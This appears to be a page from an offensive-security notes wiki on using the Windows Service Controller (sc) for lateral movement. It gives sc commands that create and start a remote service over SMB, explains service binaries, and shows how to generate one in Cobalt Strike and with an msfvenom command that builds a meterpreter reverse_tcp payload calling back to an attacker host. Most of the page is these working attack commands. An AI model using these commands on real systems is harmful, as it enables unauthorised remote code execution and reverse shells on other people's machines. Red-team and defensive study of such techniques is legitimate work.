Bebzounette
Search
K
Comment on page

Service Control (SC)

Administrator rights on the target machine are mandatory.
The Service Controller (sc) proves particularly valuable for attackers, enabling task scheduling via SMB.
sc \\host.domain create ExampleService binpath= “c:\windows\system32\calc.exe”
sc \\host.domain start ExampleService
The caveat here is that the executable must specifically be a service binary. Service binaries differ in that they need to "register" with the Service Control Manager (SCM), and if not, they terminate execution. Hence, if a non-service binary is used for this purpose, it will come back as a brief agent/beacon for a moment and then terminate.
Directly creating an executable that runs as a service is possible:
In Cobalt Strike, navigate to Attacks > Packages > Windows Executable (S), and select the Service Binary output type.
Executable Windows en tant que service dans CobaltStrike
Using msfvenom, specify the exe-service format:
msfvenom -p windows/meterpreter/reverse_tcp -f exe-service LHOST=<IP> LPORT=<PORT> -o service.exe